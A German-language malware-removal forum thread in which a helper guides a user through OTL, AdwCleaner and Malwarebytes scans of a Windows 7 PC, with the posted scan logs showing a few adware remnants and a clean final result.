[2012.10.10 19:03:24 | 003,968,880 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ntkrnlpa.exe
[2012.10.10 19:03:24 | 003,914,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ntoskrnl.exe
[2012.10.10 19:03:19 | 001,162,240 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\kernel32.dll
[2012.10.10 19:03:19 | 000,424,448 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\KernelBase.dll
[2012.10.10 19:03:19 | 000,338,432 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\conhost.exe
[2012.10.10 19:03:19 | 000,215,040 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\winsrv.dll
[2012.10.10 19:03:18 | 000,362,496 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wow64win.dll
[2012.10.10 19:03:18 | 000,243,200 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wow64.dll
[2012.10.10 19:03:18 | 000,025,600 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\setup16.exe
[2012.10.10 19:03:18 | 000,016,384 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ntvdm64.dll
[2012.10.10 19:03:18 | 000,014,336 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ntvdm64.dll
[2012.10.10 19:03:18 | 000,013,312 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wow64cpu.dll
[2012.10.10 19:03:18 | 000,005,120 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\wow32.dll
[2012.10.10 19:03:18 | 000,004,608 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-processthreads-l1-1-0.dll
[2012.10.10 19:03:18 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-memory-l1-1-0.dll
[2012.10.10 19:03:17 | 000,007,680 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\instnm.exe
[2012.10.10 19:03:17 | 000,004,608 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-threadpool-l1-1-0.dll
[2012.10.10 19:03:17 | 000,004,608 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-processthreads-l1-1-0.dll
[2012.10.10 19:03:17 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-sysinfo-l1-1-0.dll
[2012.10.10 19:03:17 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-sysinfo-l1-1-0.dll
[2012.10.10 19:03:17 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-synch-l1-1-0.dll
[2012.10.10 19:03:17 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-synch-l1-1-0.dll
[2012.10.10 19:03:17 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-misc-l1-1-0.dll
[2012.10.10 19:03:17 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-localregistry-l1-1-0.dll
[2012.10.10 19:03:17 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-localregistry-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-rtlsupport-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-processenvironment-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-processenvironment-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-namedpipe-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-namedpipe-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-misc-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-memory-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-libraryloader-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-libraryloader-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-interlocked-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-heap-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-xstate-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-util-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-string-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-string-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-rtlsupport-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-profile-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-profile-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-io-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-io-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-interlocked-l1-1-0.dll
[2012.10.10 19:03:16 | 000,006,144 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-security-base-l1-1-0.dll
[2012.10.10 19:03:16 | 000,005,120 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-file-l1-1-0.dll
[2012.10.10 19:03:16 | 000,005,120 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-file-l1-1-0.dll
[2012.10.10 19:03:16 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-heap-l1-1-0.dll
[2012.10.10 19:03:16 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-handle-l1-1-0.dll
[2012.10.10 19:03:16 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-handle-l1-1-0.dll
[2012.10.10 19:03:16 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-fibers-l1-1-0.dll
[2012.10.10 19:03:16 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-fibers-l1-1-0.dll
[2012.10.10 19:03:16 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-errorhandling-l1-1-0.dll
[2012.10.10 19:03:16 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-errorhandling-l1-1-0.dll
[2012.10.10 19:03:16 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-delayload-l1-1-0.dll
[2012.10.10 19:03:16 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-delayload-l1-1-0.dll
[2012.10.10 19:03:16 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-debug-l1-1-0.dll
[2012.10.10 19:03:16 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-debug-l1-1-0.dll
[2012.10.10 19:03:16 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-datetime-l1-1-0.dll
[2012.10.10 19:03:16 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-datetime-l1-1-0.dll
[2012.10.10 19:03:14 | 000,006,144 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-security-base-l1-1-0.dll
[2012.10.10 19:03:14 | 000,004,608 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-threadpool-l1-1-0.dll
[2012.10.10 19:03:14 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-localization-l1-1-0.dll
[2012.10.10 19:03:14 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-xstate-l1-1-0.dll
[2012.10.10 19:03:14 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-util-l1-1-0.dll
[2012.10.10 19:03:13 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-localization-l1-1-0.dll
[2012.10.10 19:03:13 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-console-l1-1-0.dll
[2012.10.10 19:03:13 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-console-l1-1-0.dll
[2012.10.10 19:03:12 | 000,002,048 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\user.exe
[2012.10.10 19:03:07 | 000,220,160 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wintrust.dll
[2012.10.10 19:02:55 | 001,464,320 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\crypt32.dll
[2012.10.10 19:02:54 | 000,140,288 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\cryptnet.dll
[2012.10.08 20:45:28 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Live Add-in
[2012.10.08 19:30:24 | 000,000,000 | ---D | C] -- C:\Users\ASUS TT\AppData\Roaming\TuneUp Software
[2012.10.08 19:24:18 | 000,000,000 | ---D | C] -- C:\ProgramData\TuneUp Software
[2012.10.08 19:24:00 | 000,000,000 | -HSD | C] -- C:\ProgramData\{32364CEA-7855-4A3C-B674-53D8E9B97936}
[2012.10.08 19:23:59 | 000,000,000 | -H-D | C] -- C:\ProgramData\Common Files
[2012.10.07 20:08:40 | 000,000,000 | ---D | C] -- C:\Windows\pss
[2012.10.07 19:56:06 | 000,514,560 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\qdvd.dll
[2012.10.07 19:56:06 | 000,366,592 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\qdvd.dll
[2012.10.07 19:49:01 | 000,000,000 | ---D | C] -- C:\Users\ASUS TT\Tracing
[2012.10.07 19:28:28 | 000,000,000 | ---D | C] -- C:\Windows\en
[2012.10.07 19:27:59 | 000,000,000 | ---D | C] -- C:\Windows\de
[2012.10.07 19:19:32 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Reference Assemblies
[2012.10.07 19:19:32 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\MSBuild
[2012.10.07 19:19:31 | 000,000,000 | ---D | C] -- C:\Windows\SysWow64\XPSViewer
[2012.10.07 19:19:31 | 000,000,000 | ---D | C] -- C:\Windows\SysWow64\BestPractices
[2012.10.07 19:19:30 | 000,000,000 | ---D | C] -- C:\Program Files\Reference Assemblies
[2012.10.07 19:19:30 | 000,000,000 | ---D | C] -- C:\Program Files\MSBuild
[2012.10.07 19:19:30 | 000,000,000 | ---D | C] -- C:\inetpub
[2012.10.07 19:19:30 | 000,000,000 | ---D | C] -- C:\Windows\SysNative\BestPractices
[2012.10.07 15:47:21 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools
[2012.10.07 15:47:09 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\Designer
[2012.10.07 15:46:51 | 000,000,000 | ---D | C] -- C:\Windows\ShellNew
[2012.10.07 15:46:45 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Microsoft Office
[2012.10.07 13:40:15 | 062,164,608 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\MRT.exe
[2012.10.07 13:18:48 | 000,000,000 | ---D | C] -- C:\Users\ASUS TT\Simon u. Garfunkel 1999
[2012.10.02 16:21:30 | 000,000,000 | ---D | C] -- C:\Users\ASUS TT\Documents\_Transfer
[2012.10.02 16:19:03 | 000,000,000 | ---D | C] -- C:\Users\ASUS TT\AppData\Local\PDF24
 
========== Files - Modified Within 30 Days ==========
 
[2012.10.29 14:35:32 | 000,014,016 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2012.10.29 14:35:32 | 000,014,016 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2012.10.29 14:35:05 | 001,839,024 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI
[2012.10.29 14:35:05 | 000,785,562 | ---- | M] () -- C:\Windows\SysNative\perfh007.dat
[2012.10.29 14:35:05 | 000,725,776 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat
[2012.10.29 14:35:05 | 000,180,820 | ---- | M] () -- C:\Windows\SysNative\perfc007.dat
[2012.10.29 14:35:05 | 000,147,374 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat
[2012.10.29 14:30:31 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\ASUS TT\Desktop\OTL.exe
[2012.10.29 14:27:50 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2012.10.29 14:27:46 | 3220,627,456 | -HS- | M] () -- C:\hiberfil.sys
[2012.10.28 21:48:28 | 000,000,512 | ---- | M] () -- C:\Users\ASUS TT\Desktop\MBR.dat
[2012.10.28 21:05:54 | 004,731,392 | ---- | M] (AVAST Software) -- C:\Users\ASUS TT\Desktop\aswMBR.exe
[2012.10.28 15:21:42 | 002,213,464 | ---- | M] (Kaspersky Lab ZAO) -- C:\Users\ASUS TT\Desktop\tdsskiller.exe
[2012.10.28 14:59:57 | 004,989,309 | R--- | M] (Swearware) -- C:\Users\ASUS TT\Desktop\ComboFix.exe
[2012.10.25 18:57:23 | 000,086,249 | ---- | M] () -- C:\Users\ASUS TT\Documents\Ausgabentabelle Katja und Thomas aktuell_tt alleine 10.2012.ods
[2012.10.25 17:17:19 | 000,000,027 | ---- | M] () -- C:\Windows\SysNative\drivers\etc\hosts
[2012.10.24 19:00:36 | 000,538,941 | ---- | M] () -- C:\Users\ASUS TT\Desktop\adwcleaner.exe
[2012.10.21 18:24:04 | 002,322,184 | ---- | M] (ESET) -- C:\Users\ASUS TT\Desktop\esetsmartinstaller_enu.exe
[2012.10.14 20:16:07 | 000,696,760 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerApp.exe
[2012.10.14 20:16:07 | 000,073,656 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
[2012.10.14 19:59:00 | 000,001,857 | ---- | M] () -- C:\Users\Public\Desktop\PDF24 Fax.lnk
[2012.10.14 19:58:59 | 000,001,872 | ---- | M] () -- C:\Users\Public\Desktop\PDF24 Editor.lnk
[2012.10.12 20:05:11 | 000,058,445 | ---- | M] () -- C:\Users\ASUS TT\Documents\Bild DNS Fehler bei Reiter Anwendungen.pdf
[2012.10.10 19:39:15 | 000,002,628 | ---- | M] () -- C:\Users\ASUS TT\Desktop\Testdruck für Farbdrucker - Verknüpfung.lnk
[2012.10.10 19:38:59 | 000,002,436 | ---- | M] () -- C:\Users\ASUS TT\Desktop\SoundControl - Verknüpfung.lnk
[2012.10.10 19:38:35 | 000,003,388 | ---- | M] () -- C:\Users\ASUS TT\Desktop\tvbrowser-transportable - Verknüpfung.lnk
[2012.10.10 19:37:34 | 000,001,674 | ---- | M] () -- C:\Users\ASUS TT\Desktop\adrl.lnk
[2012.10.10 19:37:03 | 000,001,965 | ---- | M] () -- C:\Users\ASUS TT\Desktop\Ausgabentabelle Katja und Thomas.lnk
[2012.10.07 19:20:26 | 001,723,808 | ---- | M] () -- C:\Windows\SysWow64\PerfStringBackup.INI
[2012.10.07 15:47:47 | 000,000,400 | ---- | M] () -- C:\Windows\ODBC.INI
[2012.10.02 00:08:12 | 000,001,912 | ---- | M] () -- C:\Windows\epplauncher.mif
 
========== Files Created - No Company Name ==========
 
[2012.10.28 21:48:28 | 000,000,512 | ---- | C] () -- C:\Users\ASUS TT\Desktop\MBR.dat
[2012.10.25 18:53:55 | 000,086,249 | ---- | C] () -- C:\Users\ASUS TT\Documents\Ausgabentabelle Katja und Thomas aktuell_tt alleine 10.2012.ods
[2012.10.25 17:10:02 | 000,256,000 | ---- | C] () -- C:\Windows\PEV.exe
[2012.10.25 17:10:02 | 000,208,896 | ---- | C] () -- C:\Windows\MBR.exe
[2012.10.25 17:10:02 | 000,098,816 | ---- | C] () -- C:\Windows\sed.exe
[2012.10.25 17:10:02 | 000,080,412 | ---- | C] () -- C:\Windows\grep.exe
[2012.10.25 17:10:02 | 000,068,096 | ---- | C] () -- C:\Windows\zip.exe
[2012.10.24 18:57:28 | 000,538,941 | ---- | C] () -- C:\Users\ASUS TT\Desktop\adwcleaner.exe
[2012.10.14 19:59:00 | 000,001,857 | ---- | C] () -- C:\Users\Public\Desktop\PDF24 Fax.lnk
[2012.10.14 19:58:59 | 000,001,872 | ---- | C] () -- C:\Users\Public\Desktop\PDF24 Editor.lnk
[2012.10.12 20:05:36 | 000,058,445 | ---- | C] () -- C:\Users\ASUS TT\Documents\Bild DNS Fehler bei Reiter Anwendungen.pdf
[2012.10.07 19:27:56 | 000,001,305 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Movie Maker.lnk
[2012.10.07 15:47:21 | 000,002,715 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Excel.lnk
[2012.10.07 15:47:21 | 000,002,703 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft PowerPoint.lnk
[2012.10.07 15:47:21 | 000,002,683 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Word.lnk
[2012.09.23 10:39:16 | 000,001,488 | ---- | C] () -- C:\Users\ASUS TT\AppData\Local\RecConfig.xml
[2012.08.22 08:32:10 | 000,000,524 | ---- | C] () -- C:\Windows\wininit.ini
[2012.07.20 20:08:22 | 000,000,400 | ---- | C] () -- C:\Windows\ODBC.INI
[2012.07.01 13:08:37 | 000,175,616 | ---- | C] () -- C:\Windows\SysWow64\unrar.dll
[2012.07.01 12:42:02 | 001,723,808 | ---- | C] () -- C:\Windows\SysWow64\PerfStringBackup.INI
 
========== ZeroAccess Check ==========
 
[2009.07.14 05:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2012.06.09 06:43:10 | 014,172,672 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2012.06.09 05:41:00 | 012,873,728 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009.07.14 02:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2010.11.20 13:19:02 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009.07.14 02:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
 
========== LOP Check ==========
 
[2012.08.17 00:43:05 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\Ashampoo
[2012.09.23 10:27:32 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\Audacity
[2012.09.26 22:40:24 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\BirthdayRemember
[2012.07.09 20:02:52 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\Canneverbe Limited
[2012.09.18 19:27:03 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\Downloaded Installations
[2012.10.18 00:10:40 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\DriverCure
[2012.08.14 23:15:02 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\DVDVideoSoft
[2012.08.14 02:07:22 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\DVDVideoSoftIEHelpers
[2012.07.01 13:00:58 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\FreeCommander
[2012.07.08 20:30:14 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\FRITZ!
[2012.07.08 20:20:19 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\FRITZ!fax für FRITZ!Box
[2012.08.26 21:23:37 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\GetRightToGo
[2012.07.01 14:56:42 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\Greenshot
[2012.08.26 22:24:55 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\Highresolution Enterprises
[2012.08.10 21:42:41 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\KLS Soft
[2012.10.25 18:36:12 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\Nitro PDF
[2012.07.01 20:07:40 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\OpenOffice.org
[2012.09.28 22:49:56 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\SoundControl
[2012.10.18 00:10:39 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\SpeedyPC Software
[2012.07.22 12:07:33 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\TeamViewer
[2012.10.08 19:30:24 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\TuneUp Software
[2012.09.26 00:29:28 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\TV-Browser
[2012.07.09 19:28:08 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\Windows Live Writer
 
========== Purity Check ==========
 
 

< End of report >

--- --- ---

cosinus · 29.10.2012, 15:25

adwCleaner - Toolbars und ungewollte Start-/Suchseiten aufspüren

Downloade Dir bitte AdwCleaner auf deinen Desktop.

Falls der adwCleaner schon mal in der runtergeladen wurde, bitte die alte adwcleaner.exe löschen und neu runterladen!!

Starte die adwcleaner.exe mit einem Doppelklick.
Klicke auf Suche.
Nach Ende des Suchlaufs öffnet sich eine Textdatei.
Poste mir den Inhalt mit deiner nächsten Antwort.
Die Logdatei findest du auch unter C:\AdwCleaner[Rx].txt. (x=fortlaufende Nummer)

tiggth1 · 29.10.2012, 22:48

Hallo Cosinus,
bemerkenswert wie du (ihr) hier angagiert seid. Aber ich frag mich nun, was die ganzen log-Dateien bringen? Ist noch nicht klar, ob hier ein Virus drauf ist? Sucht /prüft ihr noch? Bei allen Bemühungen überlege ich nun, ob es nach 1 Woche nicht sinnvoller ist, die pers. Daten zu sichern und das ganze System platt zu machen. Ist echt arbeit aber wie lange geht das noch? Bitte nicht falsch verstehen, eure Arbeit für lullu gebührt allen Respekt.
Hier die Logdatei aus adwcleaner:

Code:

ATTFilter

# AdwCleaner v2.005 - Datei am 29/10/2012 um 22:44:36 erstellt
# Aktualisiert am 14/10/2012 von Xplode
# Betriebssystem : Windows 7 Ultimate Service Pack 1 (64 bits)
# Benutzer : ASUS TT - ASUSTT-PC
# Bootmodus : Normal
# Ausgeführt unter : C:\Users\ASUS TT\Desktop\adwcleaner.exe
# Option [Suche]


**** [Dienste] ****


***** [Dateien / Ordner] *****


***** [Registrierungsdatenbank] *****


***** [Internet Browser] *****

-\\ Internet Explorer v9.0.8112.16421

[OK] Die Registrierungsdatenbank ist sauber.

-\\ Mozilla Firefox v16.0.2 (de)

Profilname : default 
Datei : C:\Users\ASUS TT\AppData\Roaming\Mozilla\Firefox\Profiles\ewlyys0h.default\prefs.js

Gefunden : user_pref("browser.search.selectedEngine", "MyStart Search");
Gefunden : user_pref("extensions.5026b649cf863.scode", "(function(){try{if('aol.com,mail.google.com,mystart.inc[...]

*************************

AdwCleaner[R1].txt - [1811 octets] - [24/10/2012 19:00:38]
AdwCleaner[R2].txt - [1871 octets] - [24/10/2012 22:05:06]
AdwCleaner[S1].txt - [1771 octets] - [24/10/2012 22:05:22]
AdwCleaner[R3].txt - [1148 octets] - [24/10/2012 22:11:05]
AdwCleaner[S2].txt - [1210 octets] - [24/10/2012 22:11:48]
AdwCleaner[R4].txt - [1178 octets] - [24/10/2012 22:13:43]
AdwCleaner[R5].txt - [1273 octets] - [29/10/2012 22:44:36]

########## EOF - C:\AdwCleaner[R5].txt - [1333 octets] ##########

mfg Thomas

cosinus · 31.10.2012, 16:54

Zitat:

Aber ich frag mich nun, was die ganzen log-Dateien bringen? Ist noch nicht klar, ob hier ein Virus drauf ist? Sucht /prüft ihr noch? Bei allen Bemühungen überlege ich nun, ob es nach 1 Woche nicht sinnvoller ist, die pers. Daten zu sichern und das ganze System platt zu machen.

Was macht man denn logischerweise wenn man nicht weiß wo genau das Problem ist?
Man versucht systematisch Informationen in Form von Logdateien zu sammeln um evtl da auf Unstimmigkeiten zu stoßen!
Natürlich kann man jedes noch so kleine Probleme wegformatieren aber nicht jedem ist damit geholfen!

Sieht ok aus. Wir sollten fast durch sein. Mach bitte zur Kontrolle einen Scan mit Malwarebytes und poste das Log.
Denk dran das Tool zu updaten vor dem Scan!!

tiggth1 · 01.11.2012, 01:04

Hallo Cosinus,
danke für die Info.
Hier die Logdatei aus Malwarebytes, nichts gefunden.

Code:

ATTFilter

Malwarebytes Anti-Malware 1.65.1.1000
www.malwarebytes.org

Datenbank Version: v2012.10.31.07

Windows 7 Service Pack 1 x64 NTFS
Internet Explorer 9.0.8112.16421
ASUS TT :: ASUSTT-PC [Administrator]

31.10.2012 18:02:08
mbam-log-2012-10-31 (18-02-08).txt

Art des Suchlaufs: Vollständiger Suchlauf (C:\|D:\|E:\|)
Aktivierte Suchlaufeinstellungen: Speicher | Autostart | Registrierung | Dateisystem | Heuristiks/Extra | HeuristiKs/Shuriken | PUP | PUM
Deaktivierte Suchlaufeinstellungen: P2P
Durchsuchte Objekte: 316292
Laufzeit: 25 Minute(n), 24 Sekunde(n)

Infizierte Speicherprozesse: 0
(Keine bösartigen Objekte gefunden)

Infizierte Speichermodule: 0
(Keine bösartigen Objekte gefunden)

